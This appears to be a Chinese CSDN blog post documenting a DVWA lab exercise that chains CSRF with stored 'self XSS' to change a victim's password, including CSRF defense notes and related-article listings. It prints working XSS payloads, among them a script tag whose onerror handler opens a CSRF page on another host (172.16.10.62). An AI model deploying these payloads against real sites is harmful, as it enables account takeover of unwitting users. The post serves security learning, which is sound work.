CSRF +self xss的运用【DVWA测试】

最新推荐文章于 2022-08-17 08:46:14 发布
最新推荐文章于 2022-08-17 08:46:14 发布
阅读量330 收藏
点赞数
文章标签: csrf xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Miracle_ze/article/details/126364688
版权

CSRF +Self XSS

CSRF漏洞

产生原因:由于服务器未对客户端用户正确的身份校验,导致用户可以任意提交文件

防御:加上身份校验,添加token值
cookie的token值进行防御。
在注册用户的时候服务器会生成token。

短链接是可以隐藏网站真正目的,比如把修改密码网站改为短链接就看不出来了。为此csrf漏洞就用户点击就被改密码了

Self XSS

selfxss,顾名思义,自己输入xss脚本,输出仅自己看到,仅xss到自己。
document.cookie 获取cookie值
因为登录的是自己的用户使用这个命令就将只获取自己的cookie值。

如此我们认为这个很鸡肋如同废物一般的操作,为此想要把selfxss变废为宝就需要加上csrf。
当我我们发现传输中有一个CSRF的漏洞,传输没有带上token值。我们就可以两者利用,使用CSRF来构造一个form表单,在form表单中写上selfxss的地址【存储型xss,把地址存入数据库】。当他人点击CSRF给的链接的适合就会执行一次selfxss命令并且获取到cookie。

DVWA对CSRF +self xss的运用

靶场环境与工具

本机:win10
DVWA:安装在本机
BEEF:安装在kali
工具:OWASP CSRFester
DVWA的安全等级设置为:LOW
在这里插入图片描述

1、使用工具创建恶意网页

输入但是不点击change因为要工具抓取
在这里插入图片描述

在这里插入图片描述

修改代理服务器为8008抓取数据包【点击start】
在这里插入图片描述

点击change

在这里插入图片描述

抓取到修改后信息后点stop停止抓取。
将参数填入点击change后生成html。

在这里插入图片描述

生成的html

![在这里插入图片描述](https://img-blog.csdnimg.cn/900e0c5c9ffc4daba94e3cb8c9110fe5.png)

修改表单值得到恶意页面
在这里插入图片描述

输入构造语句,为因为输入内容字符长被限制。进行修改
在这里插入图片描述

关闭代理

2、构造xss语句

<script src="192.168.56.1/demo.html"></script>

在这里插入图片描述

录入到数据库刷新重新登录使用654321登录
在这里插入图片描述
登录失败。我们采用123456密码是成功登录了。没有修改密码。如此重新登录,密码还是123456,进行失败原因待查证

3、构造第二种xss语句

<script src="x"
onerror=javascript:window.open("http://172.16.10.62/demo.html")>
</script>

在这里插入图片描述

录入后自动跳转修改了密码
在这里插入图片描述
刷新登录密码已经变成了654321
在这里插入图片描述

Miracle_ze
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss+csrf+html练习源码.rar_XSS_csrf_csrf源码_xss源码_xss练习源码
09-20
xss反射存储型的+csrf+html注入老网站的练习源码
CSRF+Self XSS
newlife1441的博客
08-16 554
CSRF,跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并运行一些操作(如发邮件,发消息,甚至财产操作如转账和购买商品)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去运行。。防御原理:由于服务端没有对客户端进行身份校验,所以我们可以通过添加令牌token、验证码等方法来防御csrfCSRF 利用的是网站对用户浏览器的信任。Self XSS,自己输入xss脚本,输出仅自己看到,仅xss。............
Self-XSS到可利用的xss
热门推荐
一个码农的笔记
01-07 3万+
翻译自:https://medium.com/@0xHyde/cookie-based-self-xss-to-good-xss-d0d1ca16dd0e 翻译:聂心明 上个月我收到来自Synack团队的私有赏金任务,最后我在网站中发现了一个反射型xss。因为这是私有赏金任务,我不能在writeup中提到目标的信息。但是我会演示我是怎样绕过各种限制的。我最后得到了$272,因为我没有证明我能访问d...
pwnhub_WTP攻击思路--self-xss高级利用
weixin_30922589的博客
07-01 447
1、self-xss+302跳转构造csrf的利用: 1、login.php 存在跳转2、http://54.223.108.205:23333/login.php?redirecturl=//vps/c.html 通过302跳转构造csrf提交到reportbug页面让管理员提交一篇有xss的文章c.html是<img src=1 onerror=document.locati...
self xss+csrf dvwa靶机复现
qq_52016943的博客
08-17 239
self XSS+CSRF
文件上传四次绕过以及selfxss+csrf
m0_57581503的博客
08-16 868
但是在代码中还是有问题,就是在解压文件时,解压失败后就直接退出了,没有删除等其他操作,我们只需要构造一个解压到一半就出错的压缩包,然后这个压缩包中要保证自己写的.php文件是可以完整解压出来的。源码分析判断:压缩包解压后仅删除文件,没有删除文件夹的操作,且没有进行递归删除,所以只需要将.php文件放入文件夹中压缩后再上传,就不会被删除。我们在浏览器中访问该.php文件,虽然理论上可以成功,但是这个一般实际上成不成功看运气,这次实验中文件夹中有图片了,但是.php文件没有生成。解压出错后再次递归删除文件。..
跨站攻击(XSS+CSRF).docx
最新发布
01-05
利用Kali Linux对DVWA的Reflected Cross Site Scripting (XSS)/Stored Cross Site Scripting (XSS)模块,包括: 1) Low等级;(15分) 2) Medium等级;(10分) 3) High级别;(10分) 4) Impossible等级的机制以及...
详解XSSCSRF简述及预防措施
10-17
主要介绍了XSSCSRF简述及预防措施,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
XSSCSRF两种跨站攻击总结
02-26
但是,历史同样悠久的XSSCSRF却没有远离我们。由于之前已经对XSS很熟悉了,所以我对用户输入的数据一直非常小心。如果输入的时候没有经过Tidy之类的过滤,我一定会在模板输出时候全部转义。所以个人感觉,要避免...
命令执行+CSRF
06-11
本节课程分两个方面,命令执行包含os命令执行、struts2远程命令执行、变量覆盖。CSRF漏洞包含GET型及POST型两种类型的CSRF漏洞,每种漏洞不仅包含原理分析还包含攻击过程演示。
使用dvwa环境进行csrf漏洞练习;ssrf漏洞;xss漏洞与csrf漏洞的区别
m0_52341820的博客
04-14 5225
csrf漏洞的原理是?如何防御和利用csrf漏洞。 当我们打开或登录某个网站后,浏览器与网站所存放的服务器将会产生一个会话,在会话结束前,用户就可以利用具有的网站权限对网站进行操作(如:发表文章、发送邮件、删除文章等)。会话借宿后,在进行权限操作,网站就会告知会话超期或重新登录。当登录网站后,浏览器就会和可信的站点建立一个经过认证的会话。所有通过这个经过认证的会话发送请求,都被认定为可信的行为,例如转账、汇款等操作。当这个会话认证的时间过长或者自主结束断开;必须重新建立经过认证的可信安全的会话。CSRF
DVWA-—【CSRF】漏洞利用
qq_34914659的博客
05-20 983
1.漏洞介绍 CSRF跨站点请求伪造(Cross—Site Request Forgery),攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。https://www.freebuf.com/articles/web/253838.htmlCSRFXSS的最大的区别在于,CSRF并没有盗取cookie而是直接利用。 下图...
XSSCSRF两种跨站攻击浅析
零度的博客专栏
08-05 531
XSS:跨站脚本(Cross-site scripting)       CSRF:跨站请求伪造(Cross-site request forgery)        在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。在这个年代, 参数化查询 已经成了普遍用法,我们已经离  SQL 注入很远了。但是,历史同样悠久的 XSS
组合拳出击-SelfXSS变废为宝
dfdhxb995397的博客
08-30 141
前言 作者:米斯特安全攻防实验室-Vulkey_Chen 博客:gh0st.cn 这是一个鸡肋性质的研究,也许有些标题党,请见谅~ 本文启发于一些讨论,和自己脑子里冒出来的想法。 组合拳搭配 SelfXSS 已知SelfXSS漏洞是这样的: 相信看见图片基本上已经知道这个漏洞形成的原因了,该功能点有一个编辑预览的,输入XSS的payload就触发。 局限点在于这...
实战:盒子的self-xss(盒子已忽略)
anlalu233的博客
07-05 1160
盒子的self-xss是我在提交一个其他网站的xss时,编辑框输入了xss代码,没想到盒子弹窗了。我惊喜地想没想到盒子自己竟然有洞,然后我兴高采烈地提交了盒子,盒子很快回复了我说该漏洞已知晓,self-xss不存在危害性,故忽略。我一盆凉水浇下来。(小声说:盒子一看到自己平台的洞审核超快,第二天就审核回复我了,而我另一个同时间提交的xss漏洞还没审核emmmm) 图片 ...
跨站脚本攻击(selfxss)笔记(三)
weixin_30807677的博客
02-23 2027
本篇纯文字发表自己对自插型xss的看法    selfxss,顾名思义,自己输入xss脚本,输出仅自己看到,仅xss到自己。    常见的有:查询框的xss、某个账号中,添加自己的分组类等    查询框的xss:    即在查询框输入什么,则在输出的页面返回什么,然后没有过滤或编码引发,插入脚本后,弹出弹框,但刷新页面后又没有了,这种就为selfxss;当然有些系统有历史查...
挖洞经验 | self-xss的进化之路
weixin_40418457的博客
05-04 2309
本文涉及漏洞点: 1、self-xss 2、scheme 跳转 3、URL 跳转 4、CSRF 5、JSONP 挖掘过程分解: 一、挖掘背景介绍 在某次冲浪过程中,随手测试了一下这个系统的预览功能,点击预览会生成二维码,需要手机QQ扫描才能访问预览界面。 随手点击F12修改HTML源码,插入XSS代码 再次扫描二维码预览,触发XSS。 原本以为这就结束了,直到换了一个账户,扫描之后才发现进坑了,这是一个self-xss,无奈洞是自己挖的,无论如何也要利用起来。 二、self-xss的上位之路 1.首
dvwa+csrf高级
10-14
DVWA(Damn Vulnerable Web Application)是一个用于练习Web应用程序渗透测试的漏洞演示平台,而CSRF(Cross-Site Request Forgery)则是一种常见的Web应用程序安全漏洞。在DVWA中,可以通过模拟CSRF攻击来学习和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值